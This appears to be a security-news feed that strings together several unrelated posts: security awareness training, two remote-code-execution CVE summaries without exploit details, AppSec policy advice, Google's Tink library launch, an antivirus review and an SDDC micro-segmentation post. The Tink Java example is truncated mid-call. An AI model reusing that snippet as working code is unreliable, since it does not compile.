  1. Behavioral modification: The training content needs to work. You should be managing to outcomes, and your desired result for security training is that employees learn what not to do (and subsequently don’t do it), so if behavior doesn’t change for a reasonable percentage of employees, that’s an indication of ineffective content.
  2. Current: Security remains a dynamic environment; your security training curriculum must keep pace. Yes, you still need to tell employees about vintage 2015 attacks because they will still see them. But you also need to train them to defend against new attack vectors like ransomware which they are likely to see in the short term.
  3. Comprehensive: Employees need to be prepared for the most likely situations. It is neither realistic nor feasible for security awareness training to turn regular employees into security professionals. But they can understand the major attack vectors and develop some sensitivity, to help them detect attacks in progress.
  4. Compelling: Most employees don’t know what’s at stake, so they don’t take training seriously. Don’t try to scare employees or play Chicken Little, but they need to understand the consequences of attacks. It gets back to helping them understand the organizational risk of screwing up. You do this by integrating a few stories and anecdotes into the training materials, making attacks and losses real and tangible; and humanize attacks, so they feel personally relevant.
  5. Fun: Boring content is boring. If employees don’t enjoy the training materials, they will shut down and do just enough to pass whatever meaningless test you put them through. They will forget what they learned as soon as they leave the room. As corny as it sounds, no fun generally means no retention.

Of course content is also subjective. What you like might not interest the rest of the organization. So we always recommend a broad testing/PoC process to ensure the content works for your organization. We’ll get into procurement later in this series.


Clearly you want employees to have fun and find the training entertaining. But that’s not the only thing you need for a successful security awareness training program. You need senior management to understand the importance of security awareness training and buy into your vision of success, as well as how you plan to quantify risk reduction and measure the impact of your program.

Many security professionals don’t have a lot of experience in getting this kind of buy-in, so let’s map out a few steps:

  1. Get facetime: As with any program you need to sell the benefits, which means getting off your butt and talking to business leaders.
  2. Sell the business value: As mentioned above, you need to communicate value and clearly define success.
  3. Identify risks: Make sure they also comprehend the risks of not training successfully. They may involve system downtime, data loss or breaches, or compliance fines. It’s not about mindless fear – you need a realistic and pragmatic assessment of the downside.
  4. What do they have to do: Finally, internal leaders need to understand the requirements on them and their teams. Are you asking for money from their budget? How much time will employees need to devote to the program?

Once you help the leadership team understand what’s in it for them, the risk, and what they need to do, you should be positioned to enlist their support. You don’t need senior management to push the program, especially if it’s required for compliance. But it certainly helps, so spend time to line up support before you launch.

Quantifying the effects of training on risk is key to successfully selling the program and getting employees engaged, so we will focus on that in our next post.

- Mike Rothman (0) Comments Subscribe to our daily email digest

CVE-2018-6498 (data_center_automation, hybrid_cloud_management, network_operations_management, operations_bridge, service_management_automation)

Remote Code Execution in the following products Hybrid Cloud Management Containerized Suite HCM2017.11, HCM2018.02, HCM2018.05, Operations Bridge Containerized Suite 2017.11, 2018.02, 2018.05, Data Center Automation Containerized Suite 2017.01 until 2018.05, Service Management Automation Suite 2017.11, 2018.02, 2018.05 and Network Operations Management (NOM) Suite CDF 2017.11, 2018.02, 2018.05 will allow Remote Code Execution.

CVE-2018-6499 (data_center_automation, hybrid_cloud_management, network_operations_management, network_virtualization, operations_bridge, service_management_automation, service_virtualization, unified_functional_testing)

Remote Code Execution in the following products Hybrid Cloud Management Containerized Suite HCM2017.11, HCM2018.02, HCM2018.05, Operations Bridge Containerized Suite 2017.11, 2018.02, 2018.05, Data Center Automation Containerized Suite 2017.01 until 2018.05, Service Management Automation Suite 2017.11, 2018.02, 2018.05, Service Virtualization (SV) with floating licenses using Any version using APLS older than 10.7, Unified Functional Testing (UFT) with floating licenses using Any version using APLS older than 10.7, Network Virtualization (NV) with floating licenses using Any version using APLS older than 10.7 and Network Operations Management (NOM) Suite CDF 2017.11, 2018.02, 2018.05 will allow Remote Code Execution.

Application Security Mistake No. 4: Ignoring AppSec Policies

We’ve been in the application security business for more than 10 years, and we’ve learned a lot in that time about what works, and what doesn’t. This is the third in a blog series that takes a look at some of the most common mistakes we see that lead to failed AppSec initiatives. Use our experience to make sure you avoid these mistakes and set yourself up for application security success.

Why policies matter

Ultimately, without an effective AppSec policy, you will be:


With the shift to DevSecOps, developers are moving fast, and if you don’t have a solid and manageable AppSec policy – your scan results will become “noise” that they will overlook or work around. Prioritization is the name of the game in a DevSecOps world. What is acceptable risk for your organization? What security-related defects absolutely must be remediated? What is OK to mitigate? What can be overlooked? If you don’t clarify these priorities, your development team will be spinning their wheels chasing down every flaw, or simply ignoring the results. One caveat: don’t set the bar too high; keep the policy achieveable for development teams. If necessary, you can increase the stringency over time as the team ups its skills and know-how. As our director of product management Tim Jarrett says, “Any policy should be only as complicated as it needs to be to deliver the necessary results, but no more than that.”


Not every flaw is a vulnerability. A flaw is a weakness in an application that needs to be investigated. A vulnerability is a flaw that has a proven exploit. If you treat every flaw as a vulnerability, you’re neglecting the vulnerabilities that are increasing your risk, while wasting precious resource time on flaws that would never be exploited – you’re pursuing perfect code at the expense of good security.

Similarly, not all apps are created equal, so create different requirements for different apps. For instance, an application that has IP, is public-facing and has third-party components may require all medium to very critical flaws to be fixed. A one-page temporary marketing site may only require high/very high flaws to be fixed. Don’t leave yourself exposed while spending time trying to put the maximum security controls on apps with minimal risk.

Lacking support

When you establish an application security policy, you’re also outlining what you plan to accomplish with your AppSec program and, in turn, proving what you have accomplished. For instance, if your policy states: “we will identify and then remediate or mitigate any OWASP Top 10 flaws,” you will have documentation of flaws found during initial scan, how they were addressed, and flaws found on subsequent scans. You can then prove that your program is reducing risk and get the support and funding you need to continue and grow your program. Without a policy, it’s unclear what the goals of your program are and if your initiatives have produced any results.

Learn From Others’ Mistakes

Don’t repeat the mistakes of the past; learn from other organizations and avoid the most common AppSec pitfalls. Today’s tip: Don’t neglect to craft a solid, thoughtful, and achieveable application security policy. Get details on all six of the most popular mistakes in our eBook, AppSec: What Not to Do.

Introducing the Tink cryptographic software library

At Google, many product teams use cryptographic techniques to protect user data. In cryptography, subtle mistakes can have serious consequences, and understanding how to implement cryptography correctly requires digesting decades' worth of academic literature. Needless to say, many developers don’t have time for that.

To help our developers ship secure cryptographic code we’ve developed Tink—a multi-language, cross-platform cryptographic library. We believe in open source and want Tink to become a community project—thus Tink has been available on GitHub since the early days of the project, and it has already attracted several external contributors. At Google, Tink is already being used to secure data of many products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, etc. After nearly two years of development, today we’re excited to announce Tink 1.2.0, the first version that supports cloud, Android, iOS, and more!

Tink aims to provide cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse. Tink is built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, but includes countermeasures to many weaknesses in these libraries, which were discovered by Project Wycheproof, another project from our team.

With Tink, many common cryptographic operations such as data encryption, digital signatures, etc. can be done with only a few lines of code. Here is an example of encrypting and decrypting with our AEAD interface in Java:


   // 1. Generate the key material.
   KeysetHandle keysetHandle = KeysetHandle.generateNew(

   // 2. Get the primitive.
   Aead aead = AeadFactory.getPrimitive(keysetHandle);

   // 3. Use the primitive.
   byte[] plaintext = ...;
   byte[] additionalData = ...;
   byte[] ciphertext = aead.encrypt(plaintext, additionalData);

Tink aims to eliminate as many potential misuses as possible. For example, if the underlying encryption mode requires nonces and nonce reuse makes it insecure, then Tink does not allow the user to pass nonces. Interfaces have security guarantees that must be satisfied by each primitive implementing the interface. This may exclude some encryption modes. Rather than adding them to existing interfaces and weakening the guarantees of the interface, it is possible to add new interfaces and describe the security guarantees appropriately.

We’re cryptographers and security engineers working to improve Google’s product security, so we built Tink to make our job easier. Tink shows the claimed security properties (e.g., safe against chosen-ciphertext attacks) right in the interfaces, allowing security auditors and automated tools to quickly discover usages where the security guarantees don’t match the security requirements. Tink also isolates APIs for potentially dangerous operations (e.g., loading cleartext keys from disk), which allows discovering, restricting, monitoring and logging their usage.

Tink provides support for key management, including key rotation and phasing out deprecated ciphers. For example, if a cryptographic primitive is found to be broken, you can switch to a different primitive by rotating keys, without changing or recompiling code.

Tink is also extensible by design: it is easy to add a custom cryptographic scheme or an in-house key management system so that it works seamlessly with other parts of Tink. No part of Tink is hard to replace or remove. All components are composable, and can be selected and assembled in various combinations. For example, if you need only digital signatures, you can exclude symmetric key encryption components to minimize code size in your application.

To get started, please check out our HOW-TO for Java, C++ and Obj-C. If you'd like to talk to the developers or get notified about project updates, you may want to subscribe to our mailing list. To join, simply send an empty email to You can also post your questions to StackOverflow, just remember to tag them with tink.

We’re excited to share this with the community, and welcome your feedback!

Quick Heal Total Security review: Lots of interesting features don’t quite make up for high price

Quick Heal Total Security makes its presence felt the moment it’s installed. On my first day with the antivirus suite it showed me a lot of notifications, and that never really stopped. 

Personally, I prefer antivirus software that gets to work and doesn’t bother me too much. That’s not Quick Heal’s approach, with its various requests to perform a full scan, several notifications that it has just installed the latest updates, and even an information alert for “6 reasons your computer might be slowing down.” I’m guessing “overzealous security suite” wasn’t one of those reasons.

Note: This review is part of our best antivirus roundup. Go there for details about competing products and how we tested them.

To read this article in full, please click here

Moving to a Software-Defined Data Center and Its Impact on Security

For 57% of enterprise organizations in our latest survey on cloud adoption, IT infrastructure took the form of a hybrid cloud, i.e. a mix of public cloud infrastructure-as-a-service (IaaS) and some form of private cloud data center. At McAfee, we spend a lot of time speaking about the benefits of using public cloud infrastructure providers like AWS and Azure. We spend less time discussing private cloud, which today is increasingly software-defined, earning the name “software-defined data center” or SDDC.

Infrastructure designed to operate as an SDDC provides the flexibility of cloud with the most control possible over IT resources. That control enables well-defined security controls with the potential to rise above and beyond what many teams are used to having at their disposal in a traditional data center, particularly when it comes to micro-segmenting policy.

To start, the concept of software-defined data center describes an environment where compute, networking, and often storage are all virtualized and abstracted above the physical hardware they run on. VMware handles the largest share of these virtualized deployments, which is a natural extension of their long history of transforming single-purpose servers into far more cost-effective virtual server infrastructure. The big change here is adding network virtualization through their technology NSX, which frees the network from physical constraints and allows it to be software-defined.

In a physical network, your infrastructure has a perimeter which you allow traffic in/out of. This limits your control to the physical points where you can intercept that traffic. In a software-defined network (a critical part of a software-defined data center) your network can be controlled at every logical point in the virtual infrastructure. For a simple example, say you have 100 VMs running in 3 compliance-based groupings. Here is how your policy could be constructed at a high level in an SDDC:

  1. Group 1: PCI compliant storage. Every VM in this group is tagged for Group 1, and network traffic limited to internal IPs only.
  2. Group 2: GDPR compliant application with customer data. Again, each VM is tagged for its group to share the same policy, this time enforcing encryption and read-only access.
  3. Group 3: Mixed-use, general purpose VMs with varying compliance requirements. In this case, each VM needs its own policy. Some may be limited to single-IP access, others open to the internet. A per-VM policy effectively introduces micro-segmentation to your infrastructure.

The point of these basic examples is to clarify the opportunity that a software-defined data center has to fine-tune policy for your assets held on-premises. If you’re also running in AWS or Azure, then what you’ve kept on-premises likely consists of your most sensitive assets, which require the most stringent protection. Controlling policy down to the individual VM gives you this flexibility. Once you’re controlling policy at the VM-level, you can also monitor and control the communication between those VMs (i.e. east-west or intra-VM), stopping lateral threat movement from one VM to another within your data center.

If you’re in a state where certain assets simply can’t enter the public cloud, and you want to make improvements in your resource efficiency and protection strategy, you should consider building out a plan to completely virtualize your data center, including the network. To help you with that strategy, we partnered with VMware and research firm IDC to write a short paper on the security benefits of adopting a software-defined data center. You can read it here to dive deeper into this topic.

The post Moving to a Software-Defined Data Center and Its Impact on Security appeared first on McAfee Blogs.